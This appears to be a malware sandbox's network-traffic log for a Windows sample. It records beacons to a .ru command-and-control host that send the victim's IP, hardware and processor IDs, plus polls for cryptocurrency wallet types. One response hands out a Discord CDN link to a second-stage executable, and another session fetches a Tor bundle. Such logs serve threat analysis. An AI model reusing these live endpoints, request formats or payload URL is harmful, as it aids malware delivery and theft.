Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:18 UTC	10688	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:19 UTC	10688	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0r97%2BB%2F1NAGPb1QXvOc2zKhn67029mMHEn8%2Bu7cq7TU9e49A2clSUFEk68C7Q5wGATRVnvTM%2F2%2F0LEG8dCy%2B%2BsK0KJ0jLxxHURj2A5pJnYdNDj3b12J%2FbNp%2FdkaGdVRTl8%2BYNFME"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a1cbf10680f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:19 UTC	10689	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:19 UTC	10689	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49825	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:19 UTC	10689	OUT	GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:19 UTC	10689	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e0j%2B1VrnQUEHYKLtyzfKMdaC5%2F6ZcrpQsOOiwiynSq5Aq%2FMQ9IA0mrwlUj4DTkHbS78i8GusrKCwfKyEU4cxu4Sw7AAUedNCmuchsIEuzV9RBi0LfOKJ32Npnmn9V7u0KQH9YiM%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a221b6dec0f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:19 UTC	10690	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	104.21.89.193	443	192.168.2.4	49825	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:19 UTC	10689	OUT	GET /getwallet.php?id=1444&wallet=xlm HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:19 UTC	10689	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e0j%2B1VrnQUEHYKLtyzfKMdaC5%2F6ZcrpQsOOiwiynSq5Aq%2FMQ9IA0mrwlUj4DTkHbS78i8GusrKCwfKyEU4cxu4Sw7AAUedNCmuchsIEuzV9RBi0LfOKJ32Npnmn9V7u0KQH9YiM%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a221b6dec0f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:19 UTC	10690	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	104.21.89.193	443	192.168.2.4	49826	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:19 UTC	10689	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:20 UTC	10690	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X5CDWwjWyBdtJeF30SMBsBDZjf6wxoiWwqBNEmKT2jfNQ7SOMAA7aRGBLqPx6wwE%2BGvHqxvxl9EfeybEE4phL%2FaWceTtjnWYcn2MsNE1f7fvdf%2Frds%2FKCgc7IyMwV%2BBtpijUfHeR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a23f8adf8d5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:20 UTC	10690	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:20 UTC	10690	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.4	49826	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:19 UTC	10689	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:20 UTC	10690	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X5CDWwjWyBdtJeF30SMBsBDZjf6wxoiWwqBNEmKT2jfNQ7SOMAA7aRGBLqPx6wwE%2BGvHqxvxl9EfeybEE4phL%2FaWceTtjnWYcn2MsNE1f7fvdf%2Frds%2FKCgc7IyMwV%2BBtpijUfHeR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a23f8adf8d5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:20 UTC	10690	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:20 UTC	10690	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.4	49828	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:20 UTC	10690	OUT	GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:21 UTC	10690	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3JR10s5MJIgm2yTpnxWB0io8jVeZybsWy7fRP4P0sB%2BR1BYHd0ljC17SGO7JYm%2F7c4LL653NYzT5a1gUZKPJOBRgKaMeWxmW2g2c7%2B19uNzqyUp7S3d0b5EgYDwgLIxnqgQY9NUt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a2a4c1fc3a5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:21 UTC	10691	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	104.21.89.193	443	192.168.2.4	49828	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:20 UTC	10690	OUT	GET /getwallet.php?id=1444&wallet=xrp HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:21 UTC	10690	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3JR10s5MJIgm2yTpnxWB0io8jVeZybsWy7fRP4P0sB%2BR1BYHd0ljC17SGO7JYm%2F7c4LL653NYzT5a1gUZKPJOBRgKaMeWxmW2g2c7%2B19uNzqyUp7S3d0b5EgYDwgLIxnqgQY9NUt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a2a4c1fc3a5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:21 UTC	10691	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49748	20.29.134.23	443	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	793	OUT	GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
2023-11-18 09:02:38 UTC	793	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 18 Nov 2023 09:02:38 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2023-11-18 09:02:38 UTC	794	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 63 Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.githubc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	20.29.134.23	443	192.168.2.4	49748	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	793	OUT	GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
2023-11-18 09:02:38 UTC	793	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 18 Nov 2023 09:02:38 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231118%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231118T090238Z&X-Amz-Expires=300&X-Amz-Signature=70af1f9a98f6f7decd9243215e43e906d5d375fed061f16f63b7782e965ba97c&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2023-11-18 09:02:38 UTC	794	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 63 Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.githubc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	104.21.89.193	443	192.168.2.4	49830	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:22 UTC	10691	OUT	GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:22 UTC	10691	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n2KJryd1ACFtYLGuhkye5x32QrFh2Y%2BAQwuPh%2BOX7zreELHUvqsOkUEB4yGcUMo62tBQWcBnH3AdtniaZG14iTG%2F3z%2BVNwT3WHdcLVGc1cH1MzezASWW9nPhWJMelYEUv8oIUpta"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a356ac6eb3f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:22 UTC	10692	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.4	49830	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:22 UTC	10691	OUT	GET /getwallet.php?id=1444&wallet=ltc HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:22 UTC	10691	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n2KJryd1ACFtYLGuhkye5x32QrFh2Y%2BAQwuPh%2BOX7zreELHUvqsOkUEB4yGcUMo62tBQWcBnH3AdtniaZG14iTG%2F3z%2BVNwT3WHdcLVGc1cH1MzezASWW9nPhWJMelYEUv8oIUpta"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a356ac6eb3f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:22 UTC	10692	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	104.21.89.193	443	192.168.2.4	49831	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:22 UTC	10691	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:23 UTC	10692	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZiY0ZDVgyDpKXhao6qlZEj25OWs%2BJYhGg7TtTPgCD4JWMoIR2qZcrVy3H0vkdViPCUXQIg8L4vF9gm33LAG%2Fjn1kcU7iCmQqY5MiaucaxOWPyzpXi8HspoUqAeIxqrGsvVyibsLf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a371f4e30a5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:23 UTC	10692	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:23 UTC	10692	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.4	49831	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:22 UTC	10691	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:23 UTC	10692	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZiY0ZDVgyDpKXhao6qlZEj25OWs%2BJYhGg7TtTPgCD4JWMoIR2qZcrVy3H0vkdViPCUXQIg8L4vF9gm33LAG%2Fjn1kcU7iCmQqY5MiaucaxOWPyzpXi8HspoUqAeIxqrGsvVyibsLf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a371f4e30a5-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:23 UTC	10692	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:23 UTC	10692	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.4	49834	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:23 UTC	10692	OUT	GET /getwallet.php?id=14441&wallet=nec HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:23 UTC	10692	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zYY%2Blis96hO7K3sEq%2Bq79jmflwXyObRAIEDRwjtWWK%2BDkG9mSphZvawECqkkA6vLmqjskRSob1VOyxkOuK7cRMbjZwSIyNnDG7UOSff7u1%2BYDMNpGyp2Y98Tzjz%2F%2F1VkR7WTg7x%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a3ac8656a12-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:23 UTC	10693	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	104.21.89.193	443	192.168.2.4	49834	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:23 UTC	10692	OUT	GET /getwallet.php?id=14441&wallet=nec HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:23 UTC	10692	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zYY%2Blis96hO7K3sEq%2Bq79jmflwXyObRAIEDRwjtWWK%2BDkG9mSphZvawECqkkA6vLmqjskRSob1VOyxkOuK7cRMbjZwSIyNnDG7UOSff7u1%2BYDMNpGyp2Y98Tzjz%2F%2F1VkR7WTg7x%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a3ac8656a12-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:23 UTC	10693	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.4	49836	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:23 UTC	10692	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:24 UTC	10693	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZcXWb9AT8pe6eLDWbqXyEMhLKbtglFtmWhoSefK9KhbnuPJnj2KC6mo7h0ORCWXjRKmkohKkteymrhHkdVDK685dzGPmx7IY2x%2BMwpdhjC8mQuxCeKDq%2BUX%2BWdOVrSwMlpqoqD0l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a3e3e40c630-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:24 UTC	10694	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:24 UTC	10694	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	104.21.89.193	443	192.168.2.4	49836	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:23 UTC	10692	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:24 UTC	10693	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZcXWb9AT8pe6eLDWbqXyEMhLKbtglFtmWhoSefK9KhbnuPJnj2KC6mo7h0ORCWXjRKmkohKkteymrhHkdVDK685dzGPmx7IY2x%2BMwpdhjC8mQuxCeKDq%2BUX%2BWdOVrSwMlpqoqD0l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a3e3e40c630-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:24 UTC	10694	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:24 UTC	10694	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.4	49837	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:24 UTC	10693	OUT	GET /getwallet.php?id=1444&wallet=bch HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:24 UTC	10694	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eXhZhYsFidn7PeNpbELC5kxfY8RvrR2t%2F8V9LWPlUI4sTq0bPWXtN8YcSDm31SqAmuK9ZD%2Blsvb1cQ8ty9ZLlBfU5vqyJ0DeHesl%2B41MReQh8xaSMH0kTlgrXAkanbGtGHEHsDBa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a420e82c4d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:24 UTC	10695	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	104.21.89.193	443	192.168.2.4	49837	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:24 UTC	10693	OUT	GET /getwallet.php?id=1444&wallet=bch HTTP/1.1 Host: central-cee-doja.ru
